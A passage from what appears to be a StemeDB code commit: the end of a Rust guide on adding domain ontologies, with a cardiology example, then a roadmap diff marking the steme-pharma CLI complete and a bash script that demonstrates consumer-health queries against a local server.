// Primary entity (e.g., the main subject of claims)
domain = domain.with_entity_type(
"{PrimaryEntity}",
EntityType::required("Description")
.with_naming(NamingConvention::CamelCase)
// Add aliases for common variations
.with_alias("ALIAS", "Canonical"),
);
// Secondary entity (for compound subjects)
domain = domain.with_entity_type(
"{SecondaryEntity}",
EntityType::required("Description")
.with_naming(NamingConvention::CamelCase),
);
// -------------------------------------------------------------------------
// Predicate Schemas
// -------------------------------------------------------------------------
// Category 1: Primary predicates (single entity subject)
domain = domain.with_predicate_schema(
"category1",
PredicateSchema::new(
"Description of this predicate category",
"{PrimaryEntity}",
)
.with_predicates(vec![
"predicate_one",
"predicate_two",
])
.with_default_lens(DefaultLens::Recency),
);
// Category 2: Compound predicates (multi-entity subject)
domain = domain.with_predicate_schema(
"category2",
PredicateSchema::new(
"Description",
"{PrimaryEntity}:{SecondaryEntity}",
)
.with_predicates(vec![
"compound_predicate",
])
.with_default_lens(DefaultLens::LayeredConsensus),
);
// -------------------------------------------------------------------------
// Source Hierarchy
// -------------------------------------------------------------------------
domain = domain.with_source_hierarchy(vec![
SourceTier::new(SourceClass::Regulatory, "Tier 0: Official Sources")
.with_examples(vec!["Government agencies", "Standards bodies"])
.with_weight(1.0),
SourceTier::new(SourceClass::Clinical, "Tier 1: Primary Research")
.with_examples(vec!["Peer-reviewed journals", "Research institutions"])
.with_weight(0.9)
.with_decay(730), // 2 year half-life
SourceTier::new(SourceClass::Observational, "Tier 2: Secondary Analysis")
.with_examples(vec!["Industry reports", "Analyst research"])
.with_weight(0.7)
.with_decay(365),
SourceTier::new(SourceClass::Expert, "Tier 3: Expert Opinion")
.with_examples(vec!["Industry experts", "Consultants"])
.with_weight(0.5)
.with_decay(180),
SourceTier::new(SourceClass::Community, "Tier 4: Community")
.with_examples(vec!["Professional forums", "Curated discussions"])
.with_weight(0.3)
.with_decay(90),
SourceTier::new(SourceClass::Anecdotal, "Tier 5: Anecdotal")
.with_examples(vec!["Social media", "Blog posts"])
.with_weight(0.1)
.with_decay(30),
]);
domain
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_definition_builds() {
let domain = definition();
assert_eq!(domain.name, "{Domain}");
assert!(!domain.entity_types.is_empty());
assert!(!domain.predicate_schemas.is_empty());
assert!(!domain.source_hierarchy.is_empty());
}
#[test]
fn test_entity_normalization() {
let domain = definition();
let entity = domain.get_entity_type("{PrimaryEntity}").expect("entity exists");
// Test alias normalization
assert_eq!(entity.normalize("ALIAS"), "Canonical");
assert_eq!(entity.normalize("Canonical"), "Canonical");
}
#[test]
fn test_predicate_schema_lookup() {
let domain = definition();
// Direct lookup
let schema = domain.get_schema("category1").expect("schema exists");
assert_eq!(schema.subject_pattern, "{PrimaryEntity}");
// Lookup by predicate
let schema = domain.schema_for_predicate("predicate_one").expect("found");
assert!(schema.predicates.contains(&"predicate_one".to_string()));
}
}
```
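The template annotates `.with_decay(730)` as a two-year half-life. As a sketch of what a half-life implies for a tier's weight, assuming plain exponential decay (the formula StemeDB actually applies is not shown in this guide), and treating a tier without `with_decay` as non-decaying:

```rust
/// Hypothetical sketch: exponential decay with a half-life in days.
/// `None` models a tier with no `with_decay(...)` call (assumed: no decay).
fn effective_weight(base_weight: f64, age_days: f64, half_life_days: Option<f64>) -> f64 {
    match half_life_days {
        // After one half-life the weight is halved, after two it is quartered.
        Some(half_life) if half_life > 0.0 => base_weight * 0.5_f64.powf(age_days / half_life),
        _ => base_weight,
    }
}
```

Under these assumptions a Tier 1 claim (weight 0.9, half-life 730 days) counts as 0.45 after two years, while a Tier 5 claim (weight 0.1, half-life 30 days) drops to 0.025 after two months.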
## Step 3: Implement Extractors (Optional)
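If your domain has external data sources, implement the `MedicalExtractor` trait. Despite its name, the trait currently lives in `pharma::extractors` and is re-exported for other domains, as the `mod.rs` template in this step does.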
### Directory Structure
```
crates/stemedb-ontology/src/
  {domain}/
    mod.rs
    definition.rs
    extractors/
      mod.rs
      {source}.rs
```
### Template: `{domain}/extractors/mod.rs`
```rust
//! Data extractors for {domain}.
mod {source};
pub use {source}::{Source}Extractor;
// Re-export the shared extractor types, which currently live in the pharma module
pub use crate::pharma::extractors::{
ExtractError, MedicalClaim, MedicalExtractor, RetryConfig, SourceInput,
};
```
### Template: `{domain}/extractors/{source}.rs`
```rust
//! {Source} data extractor.

use super::{ExtractError, MedicalClaim, MedicalExtractor, SourceInput};
use async_trait::async_trait;
use stemedb_core::types::{ObjectValue, SourceClass};

/// Extractor for {Source} data.
pub struct {Source}Extractor {
    http_client: reqwest::Client,
    base_url: String,
}

impl {Source}Extractor {
    /// Create a new extractor.
    pub fn new() -> Self {
        Self {
            http_client: reqwest::Client::new(),
            base_url: "https://api.example.com".to_string(),
        }
    }
}

impl Default for {Source}Extractor {
    fn default() -> Self {
        Self::new()
    }
}

#[async_trait]
impl MedicalExtractor for {Source}Extractor {
    fn name(&self) -> &str {
        "{Source} Extractor"
    }

    fn source_class(&self) -> SourceClass {
        SourceClass::Regulatory // Adjust based on source authority
    }

    fn can_handle(&self, source: &SourceInput) -> bool {
        matches!(source, SourceInput::DrugName(_) | SourceInput::Url(_))
    }

    async fn extract(&self, source: &SourceInput) -> Result<Vec<MedicalClaim>, ExtractError> {
        let query = match source {
            SourceInput::DrugName(name) => name.clone(),
            SourceInput::Url(url) => url.clone(),
            _ => return Err(ExtractError::NotFound("Unsupported input type".into())),
        };

        // Fetch data from source
        let url = format!("{}/search?q={}", self.base_url, urlencoding::encode(&query));
        let response = self.http_client.get(&url).send().await?;

        if !response.status().is_success() {
            return Err(ExtractError::ApiError(format!(
                "HTTP {}", response.status()
            )));
        }

        // Parse response and extract claims
        let mut claims = Vec::new();

        // Example claim
        claims.push(
            MedicalClaim::new(
                "Subject",
                "predicate_name",
                ObjectValue::Float(42.0),
            )
            .with_confidence(0.9)
            .with_source_url(&url)
            .with_source_section("Section Name")
            .with_quote("Supporting quote from source")
            .with_source_class(self.source_class())
        );

        Ok(claims)
    }
}
```
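The extractor module re-exports `RetryConfig`, but the template above does not retry failed requests. The sketch below shows one common way to space retries, exponential backoff with a cap. It does not use `RetryConfig`, whose fields are not shown in this guide; `backoff_delay` and its parameters are hypothetical.

```rust
use std::time::Duration;

/// Hypothetical sketch: delay before retry number `attempt` (0-based),
/// doubling from `base` on each attempt and never exceeding `max`.
fn backoff_delay(attempt: u32, base: Duration, max: Duration) -> Duration {
    // 2^attempt, saturating so large attempt counts cannot overflow.
    let factor = 2u32.checked_pow(attempt).unwrap_or(u32::MAX);
    // If the multiplication itself overflows, fall back to the cap.
    base.checked_mul(factor).unwrap_or(max).min(max)
}
```

With a 100 ms base and a 5 s cap, the delays run 100 ms, 200 ms, 400 ms, and so on until they hit the cap.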
## Step 4: Create CLI Binary (Optional)
For user-facing domains, create a CLI tool.
### Template: `src/bin/steme_{domain}.rs`
```rust
//! CLI for {domain} domain operations.

use clap::Parser;
use stemedb_ontology::client::StemeClient;
use stemedb_ontology::{domain}::definition;

mod cli;
mod commands;

#[derive(Parser)]
#[command(name = "steme-{domain}")]
#[command(about = "{Domain} data operations for StemeDB")]
struct Cli {
    #[arg(long, default_value = "http://localhost:18180")]
    server: String,

    #[command(subcommand)]
    command: Commands,
}

#[derive(clap::Subcommand)]
enum Commands {
    /// Ingest data
    Ingest { /* args */ },
    /// Query data
    Query { /* args */ },
}

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    let cli = Cli::parse();
    let client = StemeClient::new(&cli.server);

    match cli.command {
        Commands::Ingest { /* args */ } => {
            // Implementation
        }
        Commands::Query { /* args */ } => {
            // Implementation
        }
    }

    Ok(())
}
```
## Step 5: Testing Checklist
Before considering your domain complete:
- [ ] `cargo build -p stemedb-ontology` succeeds
- [ ] `definition()` returns a valid Domain
- [ ] All entity types have meaningful descriptions
- [ ] All predicate schemas have correct subject patterns
- [ ] Entity normalization works (aliases resolve correctly)
- [ ] `schema_for_predicate()` finds the right schema
- [ ] Source hierarchy has 6 tiers with decreasing weights
- [ ] (If extractors) `cargo test -p stemedb-ontology` passes
Run the tests:
```bash
cargo test -p stemedb-ontology
cargo clippy -p stemedb-ontology -- -D warnings
```
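The checklist item about the source hierarchy can be turned into an automated check. A minimal sketch, assuming you can collect the tier weights into a slice in tier order (`is_valid_hierarchy` is a hypothetical helper, not an existing function in the crate):

```rust
/// Hypothetical check mirroring the checklist item: exactly six tiers
/// whose weights strictly decrease from tier 0 to tier 5.
fn is_valid_hierarchy(weights: &[f64]) -> bool {
    weights.len() == 6 && weights.windows(2).all(|pair| pair[0] > pair[1])
}
```

The weights used throughout this guide (`1.0, 0.9, 0.7, 0.5, 0.3, 0.1`) pass; a hierarchy with two equal neighbouring weights or a missing tier does not.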
## Step 6: Integration
### Export from lib.rs
Edit `crates/stemedb-ontology/src/lib.rs`:
```rust
// Add your domain module
pub mod {domain};
// Re-export for convenience
pub use {domain}::definition as {domain}_domain;
```
### Update ai-lookup
Add entry to `ai-lookup/index.md` under Domain Ontology section.
### Update CLAUDE.md routing (if significant)
If your domain is frequently used, add a routing entry in the Find Your Guide table.
## Complete Example: Cardiology Domain (Skeleton)
Here's a minimal working example for a cardiology domain:
```rust
// crates/stemedb-ontology/src/cardiology/mod.rs
//! Cardiology domain ontology.
pub mod definition;
pub use definition::definition;
```
```rust
// crates/stemedb-ontology/src/cardiology/definition.rs
use crate::domain::{DefaultLens, Domain, EntityType, NamingConvention, PredicateSchema, SourceTier};
use stemedb_core::types::SourceClass;
pub fn definition() -> Domain {
let mut domain = Domain::new(
"Cardiology",
"Cardiovascular conditions, procedures, and outcomes",
);
// Entities
domain = domain
.with_entity_type(
"Condition",
EntityType::required("Cardiovascular condition")
.with_naming(NamingConvention::CamelCase)
.with_alias("MI", "MyocardialInfarction")
.with_alias("CHF", "CongestiveHeartFailure")
.with_alias("AF", "AtrialFibrillation"),
)
.with_entity_type(
"Procedure",
EntityType::required("Medical procedure")
.with_naming(NamingConvention::CamelCase)
.with_alias("CABG", "CoronaryArteryBypassGraft")
.with_alias("PCI", "PercutaneousCoronaryIntervention"),
)
.with_entity_type(
"Biomarker",
EntityType::required("Diagnostic biomarker")
.with_naming(NamingConvention::CamelCase),
);
// Schemas
domain = domain
.with_predicate_schema(
"diagnosis",
PredicateSchema::new("Diagnostic criteria", "{Condition}")
.with_predicates(vec![
"diagnostic_criteria",
"staging_system",
"severity_classification",
])
.with_default_lens(DefaultLens::Authority),
)
.with_predicate_schema(
"outcome",
PredicateSchema::new("Treatment outcomes", "{Condition}:{Procedure}")
.with_predicates(vec![
"mortality_rate",
"complication_rate",
"readmission_rate",
"length_of_stay_days",
])
.with_default_lens(DefaultLens::LayeredConsensus),
)
.with_predicate_schema(
"biomarker",
PredicateSchema::new("Biomarker thresholds", "{Biomarker}")
.with_predicates(vec![
"normal_range",
"diagnostic_threshold",
"prognostic_value",
])
.with_default_lens(DefaultLens::Consensus),
);
// Source hierarchy
domain = domain.with_source_hierarchy(vec![
SourceTier::new(SourceClass::Regulatory, "Tier 0: Guidelines")
.with_examples(vec!["ACC/AHA Guidelines", "ESC Guidelines"])
.with_weight(1.0),
SourceTier::new(SourceClass::Clinical, "Tier 1: Clinical Trials")
.with_examples(vec!["Landmark RCTs", "Meta-analyses"])
.with_weight(0.9)
.with_decay(730),
SourceTier::new(SourceClass::Observational, "Tier 2: Registries")
.with_examples(vec!["NCDR", "Get With The Guidelines"])
.with_weight(0.7)
.with_decay(365),
SourceTier::new(SourceClass::Expert, "Tier 3: Expert Consensus")
.with_examples(vec!["Consensus statements", "Textbooks"])
.with_weight(0.5)
.with_decay(180),
SourceTier::new(SourceClass::Community, "Tier 4: Community")
.with_examples(vec!["Medical forums", "CME discussions"])
.with_weight(0.3)
.with_decay(90),
SourceTier::new(SourceClass::Anecdotal, "Tier 5: Anecdotal")
.with_examples(vec!["Case reports", "Social media"])
.with_weight(0.1)
.with_decay(30),
]);
domain
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_cardiology_domain() {
let domain = definition();
assert_eq!(domain.name, "Cardiology");
// Check entity aliases
let condition = domain.get_entity_type("Condition").unwrap();
assert_eq!(condition.normalize("MI"), "MyocardialInfarction");
// Check schema lookup
let schema = domain.schema_for_predicate("mortality_rate").unwrap();
assert_eq!(schema.subject_pattern, "{Condition}:{Procedure}");
}
}
```
## Troubleshooting
### "Unknown predicate" errors
Your predicate isn't in any schema. Add it to the appropriate `with_predicates()` call.
### Subject collision issues
If claims that should conflict aren't conflicting, check that:
1. The subject pattern matches your intent
2. Entity values are being normalized consistently
3. The predicate is in the right schema category
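Inconsistent normalization is the easiest of these to reproduce. The sketch below uses the `MI` alias from the cardiology example; `normalize` is a hypothetical stand-in for the entity type's own `normalize()` and assumes aliases are a simple exact-match map.

```rust
use std::collections::HashMap;

/// Hypothetical stand-in for alias normalization: map a known alias to
/// its canonical name, and leave any other value unchanged.
fn normalize<'a>(aliases: &HashMap<&'a str, &'a str>, raw: &'a str) -> &'a str {
    aliases.get(raw).copied().unwrap_or(raw)
}

/// Build a `{Condition}:{Procedure}` subject from normalized parts.
fn outcome_subject(aliases: &HashMap<&str, &str>, condition: &str, procedure: &str) -> String {
    format!("{}:{}", normalize(aliases, condition), normalize(aliases, procedure))
}
```

If one ingest path normalizes and another does not, `MI:CABG` and `MyocardialInfarction:CoronaryArteryBypassGraft` end up as different subjects and their claims never collide.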
### Extractor not finding data
1. Check the API URL is correct
2. Verify the query parameters match the API's expectations
3. Add debug logging to see raw responses
## Next Steps
- Run the Consumer Health UAT to see the pharma domain in action
- Read the [Lens documentation](../services/lens.md) to understand conflict resolution
- Check the [SDK guide](../../ai-lookup/services/sdk.md) for Go integration


@ -44,7 +44,7 @@
| **Time Travel Works** | `as_of=2024-01-01` returns historical snapshot | ✅ Infrastructure ready |
| **Decay Works** | 6-month-old Reddit claim has lower effective confidence than fresh FDA | ✅ Infrastructure ready |
| **UAT Passes** | Consumer Health scenarios documented and verified | ✅ Week 4 |
-| **Self-Serve Demo** | CLI tool lets anyone explore without code | 🚧 Week 5 |
+| **Self-Serve Demo** | CLI tool lets anyone explore without code | Week 5 |
### The Demo Script
@ -76,7 +76,7 @@
| **Week 2** ✅ | FDA extractor, claim-to-assertion signing | Ontology | Week 1 |
| **Week 3** ✅ | Ingest FDA claims, mock conflicts, SkepticLens demo | Ontology | Week 2 |
| **Week 4** ✅ | UAT scenarios documented and verified | Ontology | Week 3 |
-| **Week 5** | `steme-pharma` CLI for self-serve exploration | Ontology | Week 3 |
+| **Week 5** | `steme-pharma` CLI for self-serve exploration | Ontology | Week 3 |
| **Week 6** | Polish, factor out reusable patterns, document | Ontology | Week 4-5 |
### What's NOT in MVP
@ -1346,11 +1346,10 @@ These are valuable but not required to prove the core value proposition:
* [x] **Week 2**: FDA Extractor + Signing — `FdaLabelExtractor`, `MedicalClaim::to_assertion()`, exponential backoff. ✅ COMPLETE
* [x] **Week 3**: StemeDB Integration — `StemeClient`, `pharma-ingest` CLI, mock conflict demo. ✅ COMPLETE
* [x] **Week 4**: UAT Scenarios — Document acceptance criteria, validation tests. ✅ COMPLETE
-* [ ] **Week 5**: CLI Tool — `steme-pharma` CLI for ingest/query/compare.
+* [x] **Week 5**: CLI Tool — `steme-pharma` CLI for ingest/query/compare. ✅ COMPLETE
* [ ] **Week 6**: Generalization — Factor out reusable patterns, document "Adding a Domain".
### Next Up
-* **Week 5 MVP**: Full `steme-pharma` CLI with query, compare, and explore commands.
* **Week 6 MVP**: Factor out reusable patterns, document "Adding a Domain" guide.
* **Phase 8B-C** (deferred): Observability, geo-distribution — production concerns, not MVP blockers.
@ -1363,6 +1362,14 @@ These are valuable but not required to prove the core value proposition:
* **Agent Wallet** (Key management sidecar) -> App layer.
### Recently Completed
+* [x] **🎯 MVP Week 5**: `steme-pharma` CLI for self-serve exploration.
+* Full CLI binary with 5 subcommands: `ingest`, `query`, `compare`, `explore`, `validate`.
+* Query modes: `skeptic` (default), `layered` (per-tier), and lens-based (recency, consensus, etc.).
+* Table and JSON output formats via `comfy-table`.
+* Client extensions: `layered()`, `query()`, `list_predicates()` methods.
+* Response DTOs: `LayeredResponse`, `QueryResponse`, `AssertionDto`, `TierResolutionDto`.
+* Domain validation for known pharma predicates and subject patterns.
+* Modular design: cli.rs, commands.rs, helpers.rs, output.rs.
* [x] **🎯 MVP Week 4**: UAT scenarios documented and verified.
* Integration test suite: `crates/stemedb-ontology/tests/consumer_health_uat.rs`
* 4 automated UAT scenarios with real Ed25519 signing
@ -1597,7 +1604,10 @@ INFRASTRUCTURE (Complete) VERTICAL INTEGRATION (In Progress)
[stemedb-ontology Weeks 1-3] ✅ ───────────────────────┘
(Domain defs, FDA extractor, StemeClient) |
v
-[MVP Week 5: CLI Tool] [ ]
+[MVP Week 5: CLI Tool] ✅
+|
+v
+[MVP Week 6: Polish & Docs] [ ]
|
v
🎯 CONSUMER HEALTH MVP

scripts/demo-consumer-health.sh Executable file

@ -0,0 +1,239 @@
#!/usr/bin/env bash
# Consumer Health Demo Script
# Demonstrates StemeDB + stemedb-ontology for the Consumer Health use case
#
# Prerequisites:
# - StemeDB API running: cargo run -p stemedb-api
# - steme-pharma built: cargo build --release -p stemedb-ontology
#
# Usage:
# ./scripts/demo-consumer-health.sh
set -e
# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
BOLD='\033[1m'
NC='\033[0m' # No Color
# Configuration
STEMEDB_URL="${STEMEDB_URL:-http://localhost:18180}"
PHARMA_CLI="./target/release/steme-pharma"
PAUSE_SECONDS=2
# Helper functions
print_header() {
    echo -e "\n${BOLD}${BLUE}════════════════════════════════════════════════════════════════${NC}"
    echo -e "${BOLD}${BLUE} $1${NC}"
    echo -e "${BOLD}${BLUE}════════════════════════════════════════════════════════════════${NC}\n"
}

print_step() {
    echo -e "${CYAN}$1${NC}"
}

print_success() {
    echo -e "${GREEN}$1${NC}"
}

print_warning() {
    echo -e "${YELLOW}$1${NC}"
}

print_error() {
    echo -e "${RED}$1${NC}"
}

wait_for_user() {
    if [ -t 0 ]; then
        echo -e "\n${YELLOW}Press Enter to continue...${NC}"
        read -r
    else
        sleep $PAUSE_SECONDS
    fi
}
# Check prerequisites
print_header "Consumer Health Demo - Prerequisites Check"
# Check if steme-pharma exists
if [ ! -f "$PHARMA_CLI" ]; then
    print_warning "steme-pharma not found at $PHARMA_CLI"
    print_step "Building steme-pharma..."
    cargo build --release -p stemedb-ontology
fi

# Check if StemeDB is running
# (-f makes curl fail on HTTP error statuses, not only on connection errors)
print_step "Checking StemeDB connection..."
if curl -sf "${STEMEDB_URL}/v1/health" > /dev/null 2>&1; then
    print_success "StemeDB is running at $STEMEDB_URL"
else
    print_error "StemeDB not reachable at $STEMEDB_URL"
    echo -e "\nStart StemeDB with:"
    echo -e " ${CYAN}cargo run -p stemedb-api${NC}"
    exit 1
fi
# ============================================================================
# STEP 1: Ingest FDA Data + Mock Conflicts
# ============================================================================
print_header "Step 1: Ingest FDA Data + Mock Conflicts"
print_step "Ingesting FDA label data for Semaglutide and Tirzepatide..."
print_step "Adding mock conflicts (simulating social media contradictions)..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" ingest "semaglutide,tirzepatide" --with-conflicts
print_success "Data ingested with mock conflicts"
wait_for_user
# ============================================================================
# STEP 2: Conflict Detection (Skeptic Lens)
# ============================================================================
print_header "Step 2: Conflict Detection (Skeptic Lens)"
echo -e "${BOLD}Question:${NC} What do different sources say about Semaglutide's nausea rate?"
echo -e "${BOLD}Lens:${NC} Skeptic (shows all claims, highlights disagreements)\n"
print_step "Querying nausea_rate with Skeptic lens..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" query "Semaglutide" "nausea_rate" --mode skeptic
echo -e "\n${YELLOW}Note:${NC} The conflict score indicates disagreement between sources."
echo -e "FDA (Regulatory tier) reports clinical trial data."
echo -e "Reddit (Anecdotal tier) reports user experiences."
wait_for_user
# ============================================================================
# STEP 3: Source Hierarchy (Layered Consensus)
# ============================================================================
print_header "Step 3: Source Hierarchy (Layered Consensus)"
echo -e "${BOLD}Question:${NC} What's the consensus on HbA1c reduction, broken down by source tier?"
echo -e "${BOLD}Lens:${NC} LayeredConsensus (shows per-tier agreement)\n"
print_step "Querying hba1c_reduction_percent with Layered Consensus..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" query "Semaglutide:Type2Diabetes" "hba1c_reduction_percent" --mode layered
echo -e "\n${YELLOW}Note:${NC} Each tier shows its own consensus."
echo -e "Higher tiers (Regulatory, Clinical) have more weight in final resolution."
wait_for_user
# ============================================================================
# STEP 4: Drug Comparison
# ============================================================================
print_header "Step 4: Drug Comparison"
echo -e "${BOLD}Question:${NC} How do Semaglutide and Tirzepatide compare on weight loss?"
echo -e "${BOLD}Method:${NC} Side-by-side query of both subjects\n"
print_step "Comparing weight_loss_percent..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" compare \
"Semaglutide:Type2Diabetes" \
"Tirzepatide:Type2Diabetes" \
--predicate "weight_loss_percent"
echo -e "\n${YELLOW}Note:${NC} Both drugs' claims are shown with conflict scores."
echo -e "A consumer can see both FDA data and community reports."
wait_for_user
# ============================================================================
# STEP 5: Explore Available Data
# ============================================================================
print_header "Step 5: Explore Available Data"
echo -e "${BOLD}Question:${NC} What predicates are available for Semaglutide?"
echo -e "${BOLD}Method:${NC} List all predicates with assertions for this subject\n"
print_step "Exploring Semaglutide predicates..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" explore "Semaglutide:Type2Diabetes"
echo ""
print_step "Exploring Semaglutide safety predicates..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" explore "Semaglutide"
echo -e "\n${YELLOW}Note:${NC} Efficacy predicates use Drug:Indication subjects."
echo -e "Safety predicates use Drug-only subjects (apply across indications)."
wait_for_user
# ============================================================================
# STEP 6: JSON Output (for Integration)
# ============================================================================
print_header "Step 6: JSON Output (for Integration)"
echo -e "${BOLD}Use Case:${NC} Programmatic access for AI agents or web apps"
echo -e "${BOLD}Format:${NC} JSON output for parsing\n"
print_step "Getting JSON response..."
echo ""
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" --format json query "Semaglutide" "nausea_rate" | head -n 50
echo -e "\n... (output limited to the first 50 lines for the demo)"
wait_for_user
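# Illustrative sketch (not part of the original demo): Step 6 caps the JSON
# output at 50 lines. A small pure-Bash filter could do the same while reading
# all of its input (so the producer never sees a closed pipe) and reporting
# truncation only when lines were actually dropped. The name preview_lines and
# its message format are hypothetical.
preview_lines() {
    local limit="${1:-50}" count=0 line
    # Read every line, including a final line with no trailing newline.
    while IFS= read -r line || [ -n "$line" ]; do
        count=$((count + 1))
        if [ "$count" -le "$limit" ]; then
            printf '%s\n' "$line"
        fi
    done
    # Mention truncation only if the input exceeded the limit.
    if [ "$count" -gt "$limit" ]; then
        printf '... (%d more lines truncated for demo)\n' "$((count - limit))"
    fi
}
# Possible usage:
#   $PHARMA_CLI --stemedb-url "$STEMEDB_URL" --format json query "Semaglutide" "nausea_rate" | preview_lines 50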
# ============================================================================
# Summary
# ============================================================================
print_header "Demo Summary"
echo -e "${GREEN}${BOLD}What We Demonstrated:${NC}\n"
echo -e " 1. ${CYAN}Data Ingestion${NC}"
echo -e " - FDA label extraction (Regulatory tier)"
echo -e " - Mock social media conflicts (Anecdotal tier)"
echo ""
echo -e " 2. ${CYAN}Conflict Detection${NC}"
echo -e " - Skeptic lens shows ALL claims"
echo -e " - Conflict score quantifies disagreement"
echo ""
echo -e " 3. ${CYAN}Source Hierarchy${NC}"
echo -e " - LayeredConsensus groups by authority tier"
echo -e " - FDA data weighted higher than Reddit"
echo ""
echo -e " 4. ${CYAN}Drug Comparison${NC}"
echo -e " - Side-by-side view of multiple subjects"
echo -e " - Each drug's claims with provenance"
echo ""
echo -e " 5. ${CYAN}Data Exploration${NC}"
echo -e " - Discover available predicates"
echo -e " - Different subject patterns for efficacy vs safety"
echo ""
echo -e " 6. ${CYAN}API Integration${NC}"
echo -e " - JSON output for programmatic access"
echo -e " - Ready for AI agents and web apps"
echo ""
echo -e "${BOLD}Consumer Health Value Proposition:${NC}"
echo -e " - ${GREEN}See all perspectives${NC}, not just the loudest"
echo -e " - ${GREEN}Understand source authority${NC} (FDA vs. Reddit)"
echo -e " - ${GREEN}Make informed decisions${NC} with conflict awareness"
echo ""
echo -e "${BOLD}Next Steps:${NC}"
echo -e " - Run Consumer Health UAT: ${CYAN}cargo test -p stemedb-ontology --test consumer_health_uat${NC}"
echo -e " - Read the guide: ${CYAN}docs/app-concepts/consumer-health.md${NC}"
echo -e " - Try the Go SDK: ${CYAN}sdk/go/steme/${NC}"
echo ""
print_success "Demo complete!"